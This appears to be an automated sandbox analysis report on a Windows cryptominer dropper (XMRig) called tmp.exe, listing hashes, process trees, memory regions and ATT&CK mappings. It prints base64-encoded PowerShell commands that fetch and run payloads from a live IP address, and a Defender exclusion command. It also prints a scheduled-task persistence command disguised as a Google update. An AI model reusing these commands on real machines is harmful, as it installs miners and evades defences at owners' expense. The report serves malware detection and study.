Analysis

  • max time kernel
    150s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    05-01-2023 14:31

General

  • Target

    tmp.exe

  • Size

    35KB

  • MD5

    c1d1e760fab5a557ccaa9c30718d494d

  • SHA1

    1301f10704387b04aa1287f4b1dc9566dac2f991

  • SHA256

    0f962171e6a6219b0a1029987b166d8bd663f23f10cb53c6efe82a9bd11b6c27

  • SHA512

    849143593a1077b091049fe7ea4048340ec69a08274ed6acc86762c862f9d29ecfe5834c720dc5bb629e2ebee106237f1702a667b691f07f233374b354f8724d

  • SSDEEP

    768:8a9pgcJOnauwijxnksy4r/wOPpdwMNhghy0qt:8aXLOnaujc4kmTghy0w

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.194/go.png

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://62.204.41.194/F1.exe

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.194/me.png

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 14 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 60 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 58 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2032
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBnAG8ALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1564
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBOAG8AUwBsAGUAZQBwAC4AZQB4AGUAIgANAAoAJABXAGUAYgBGAGkAbABlACAAPQAgACIAaAB0AHQAcAA6AC8ALwA2ADIALgAyADAANAAuADQAMQAuADEAOQA0AC8ARgAxAC4AZQB4AGUAIgANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAVwBlAGIARgBpAGwAZQAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkA
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:276
      • C:\Users\Admin\AppData\Roaming\NoSleep.exe
        "C:\Users\Admin\AppData\Roaming\NoSleep.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1952
        • C:\Windows\System32\conhost.exe
          "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\NoSleep.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1044
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe\""
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:904
            • C:\Windows\system32\schtasks.exe
              schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe\""
              6⤵
              • Creates scheduled task(s)
              PID:976
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2008
            • C:\Windows\system32\schtasks.exe
              schtasks /run /tn "GoogleUpdateTaskMachineQC"
              6⤵
                PID:1888
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQAnAFwAQQBwAHAARABhAHQAYQAnAA==
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1768
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBtAGUALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1680
    • C:\Windows\system32\taskeng.exe
      taskeng.exe {20618166-D8F8-4D91-B053-A73F009B39A1} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]
      1⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1748
      • C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
        C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1920
        • C:\Windows\System32\conhost.exe
          "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe"
          3⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2044
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe "cvxjxkjice"
            4⤵
              PID:1624
            • C:\Windows\System32\conhost.exe
              C:\Windows\System32\conhost.exe pjsnsurpv0 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZebSGUfj6Vuv+kPoPZ9FoidkTm/7TRz3Cxu5/LqhuwWCS2hvmHfyPTAWIo4zY5OcwjP+79VuJh5O5c9vMH8WB3WKocLPQQ3D/631f214VrDNh9z0jOLbJJ9YXALTSKeo3z0yqpo23wDcDd1T/hDfuDceoldVJQGMTDTCXN0Q0os5qQZpM/bbi7sbKmKkdCHj6mFIu02fq5LlHaQLCNyvHRzVgK320/ko7oR3JyhnmBQHtbZUpiFNPFJEf7lTC77qWxEJ3h4yjiCPgrTI6MoBbSgjAmpPlQgNd71RJ7lG0ikmSTeoT3CddgZH5TjpSuHbPN3ha82GVaI5+j+dJzAfNAaJfxYNDrhTxng1MpRAutdkSftro/iAbX8hcx7q/b7Qg7J3CyclBC4/Mwe/Jeo6Q9AKf6F7/3Yi99ifKM20LuEsFK/pU/n4DnNACnryf3RdME
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1344

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Scheduled Task

      1
      T1053

      Persistence

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        7KB

        MD5

        ddcffce3ff5ec791a255c20d044bf5ba

        SHA1

        c36b48fc2c2a115e6a433532be43815b2c2bad9e

        SHA256

        7ba624a2e3ce7c79f81c07c2aabf261903d07449fe5506abeb971a9b5b1ae998

        SHA512

        9da15c0f92dea6eaacfb2a5b5f850d9603d29c5f995754044396835bb25191b4066a77d70c2a36f35c5654e371ae75d17127f74dfe0ba5036141d4ec2e8ded85

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        7KB

        MD5

        ddcffce3ff5ec791a255c20d044bf5ba

        SHA1

        c36b48fc2c2a115e6a433532be43815b2c2bad9e

        SHA256

        7ba624a2e3ce7c79f81c07c2aabf261903d07449fe5506abeb971a9b5b1ae998

        SHA512

        9da15c0f92dea6eaacfb2a5b5f850d9603d29c5f995754044396835bb25191b4066a77d70c2a36f35c5654e371ae75d17127f74dfe0ba5036141d4ec2e8ded85

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        7KB

        MD5

        ddcffce3ff5ec791a255c20d044bf5ba

        SHA1

        c36b48fc2c2a115e6a433532be43815b2c2bad9e

        SHA256

        7ba624a2e3ce7c79f81c07c2aabf261903d07449fe5506abeb971a9b5b1ae998

        SHA512

        9da15c0f92dea6eaacfb2a5b5f850d9603d29c5f995754044396835bb25191b4066a77d70c2a36f35c5654e371ae75d17127f74dfe0ba5036141d4ec2e8ded85

      • C:\Users\Admin\AppData\Roaming\NoSleep.exe
        Filesize

        4.4MB

        MD5

        da256d1a520061b14d1cd013d99e84ff

        SHA1

        1aad91448144852bd1bf83dcb85bd14c6db160da

        SHA256

        feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

        SHA512

        8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

      • C:\Users\Admin\AppData\Roaming\NoSleep.exe
        Filesize

        4.4MB

        MD5

        da256d1a520061b14d1cd013d99e84ff

        SHA1

        1aad91448144852bd1bf83dcb85bd14c6db160da

        SHA256

        feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

        SHA512

        8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

      • C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
        Filesize

        4.4MB

        MD5

        da256d1a520061b14d1cd013d99e84ff

        SHA1

        1aad91448144852bd1bf83dcb85bd14c6db160da

        SHA256

        feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

        SHA512

        8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

      • C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
        Filesize

        4.4MB

        MD5

        da256d1a520061b14d1cd013d99e84ff

        SHA1

        1aad91448144852bd1bf83dcb85bd14c6db160da

        SHA256

        feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

        SHA512

        8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

      • \Users\Admin\AppData\Roaming\NoSleep.exe
        Filesize

        4.4MB

        MD5

        da256d1a520061b14d1cd013d99e84ff

        SHA1

        1aad91448144852bd1bf83dcb85bd14c6db160da

        SHA256

        feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

        SHA512

        8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

      • \Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
        Filesize

        4.4MB

        MD5

        da256d1a520061b14d1cd013d99e84ff

        SHA1

        1aad91448144852bd1bf83dcb85bd14c6db160da

        SHA256

        feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

        SHA512

        8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

      • memory/276-68-0x000007FEF3440000-0x000007FEF3E63000-memory.dmp
        Filesize

        10.1MB

      • memory/276-88-0x000000000259B000-0x00000000025BA000-memory.dmp
        Filesize

        124KB

      • memory/276-79-0x000000001B7B0000-0x000000001BAAF000-memory.dmp
        Filesize

        3.0MB

      • memory/276-96-0x0000000002594000-0x0000000002597000-memory.dmp
        Filesize

        12KB

      • memory/276-73-0x0000000002594000-0x0000000002597000-memory.dmp
        Filesize

        12KB

      • memory/276-97-0x000000000259B000-0x00000000025BA000-memory.dmp
        Filesize

        124KB

      • memory/276-82-0x0000000002594000-0x0000000002597000-memory.dmp
        Filesize

        12KB

      • memory/276-56-0x0000000000000000-mapping.dmp
      • memory/276-70-0x000007FEF28E0000-0x000007FEF343D000-memory.dmp
        Filesize

        11.4MB

      • memory/904-101-0x0000000000000000-mapping.dmp
      • memory/976-104-0x0000000000000000-mapping.dmp
      • memory/1044-99-0x0000000000210000-0x000000000066B000-memory.dmp
        Filesize

        4.4MB

      • memory/1044-100-0x000000001B590000-0x000000001B9C4000-memory.dmp
        Filesize

        4.2MB

      • memory/1044-98-0x000000001B9F0000-0x000000001BE4C000-memory.dmp
        Filesize

        4.4MB

      • memory/1344-121-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1344-131-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1344-123-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1344-127-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1344-129-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1344-120-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1344-142-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1344-130-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1344-143-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1344-125-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1344-133-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1344-144-0x0000000000220000-0x0000000000240000-memory.dmp
        Filesize

        128KB

      • memory/1344-135-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1344-136-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1344-145-0x0000000000000000-0x0000000001000000-memory.dmp
        Filesize

        16.0MB

      • memory/1344-146-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1344-137-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1344-139-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/1344-140-0x000000014036EAC4-mapping.dmp
      • memory/1564-71-0x000007FEF28E0000-0x000007FEF343D000-memory.dmp
        Filesize

        11.4MB

      • memory/1564-74-0x0000000002584000-0x0000000002587000-memory.dmp
        Filesize

        12KB

      • memory/1564-92-0x000000000258B000-0x00000000025AA000-memory.dmp
        Filesize

        124KB

      • memory/1564-91-0x0000000002584000-0x0000000002587000-memory.dmp
        Filesize

        12KB

      • memory/1564-55-0x0000000000000000-mapping.dmp
      • memory/1564-58-0x000007FEFB831000-0x000007FEFB833000-memory.dmp
        Filesize

        8KB

      • memory/1564-63-0x000007FEF3440000-0x000007FEF3E63000-memory.dmp
        Filesize

        10.1MB

      • memory/1564-78-0x000000001B7A0000-0x000000001BA9F000-memory.dmp
        Filesize

        3.0MB

      • memory/1564-89-0x000000000258B000-0x00000000025AA000-memory.dmp
        Filesize

        124KB

      • memory/1564-83-0x0000000002584000-0x0000000002587000-memory.dmp
        Filesize

        12KB

      • memory/1624-115-0x00000000002B0000-0x00000000002BE000-memory.dmp
        Filesize

        56KB

      • memory/1624-117-0x0000000000060000-0x0000000000079000-memory.dmp
        Filesize

        100KB

      • memory/1624-111-0x0000000000060000-0x0000000000079000-memory.dmp
        Filesize

        100KB

      • memory/1624-113-0x0000000000000000-mapping.dmp
      • memory/1624-114-0x0000000000490000-0x00000000004AA000-memory.dmp
        Filesize

        104KB

      • memory/1680-119-0x0000000002844000-0x0000000002847000-memory.dmp
        Filesize

        12KB

      • memory/1680-77-0x000007FEF28E0000-0x000007FEF343D000-memory.dmp
        Filesize

        11.4MB

      • memory/1680-90-0x000000000284B000-0x000000000286A000-memory.dmp
        Filesize

        124KB

      • memory/1680-118-0x000000000284B000-0x000000000286A000-memory.dmp
        Filesize

        124KB

      • memory/1680-57-0x0000000000000000-mapping.dmp
      • memory/1680-69-0x000007FEF3440000-0x000007FEF3E63000-memory.dmp
        Filesize

        10.1MB

      • memory/1680-81-0x000000001B880000-0x000000001BB7F000-memory.dmp
        Filesize

        3.0MB

      • memory/1680-109-0x000000000284B000-0x000000000286A000-memory.dmp
        Filesize

        124KB

      • memory/1680-85-0x0000000002844000-0x0000000002847000-memory.dmp
        Filesize

        12KB

      • memory/1680-76-0x0000000002844000-0x0000000002847000-memory.dmp
        Filesize

        12KB

      • memory/1768-72-0x000007FEF28E0000-0x000007FEF343D000-memory.dmp
        Filesize

        11.4MB

      • memory/1768-59-0x0000000000000000-mapping.dmp
      • memory/1768-87-0x00000000028AB000-0x00000000028CA000-memory.dmp
        Filesize

        124KB

      • memory/1768-86-0x00000000028A4000-0x00000000028A7000-memory.dmp
        Filesize

        12KB

      • memory/1768-84-0x00000000028A4000-0x00000000028A7000-memory.dmp
        Filesize

        12KB

      • memory/1768-75-0x00000000028A4000-0x00000000028A7000-memory.dmp
        Filesize

        12KB

      • memory/1768-80-0x000000001B790000-0x000000001BA8F000-memory.dmp
        Filesize

        3.0MB

      • memory/1768-64-0x000007FEF3440000-0x000007FEF3E63000-memory.dmp
        Filesize

        10.1MB

      • memory/1888-105-0x0000000000000000-mapping.dmp
      • memory/1920-107-0x0000000000000000-mapping.dmp
      • memory/1952-94-0x0000000000000000-mapping.dmp
      • memory/2008-103-0x0000000000000000-mapping.dmp
      • memory/2032-54-0x00000000010E0000-0x00000000010F0000-memory.dmp
        Filesize

        64KB

      • memory/2044-110-0x0000000001EA0000-0x0000000001EA6000-memory.dmp
        Filesize

        24KB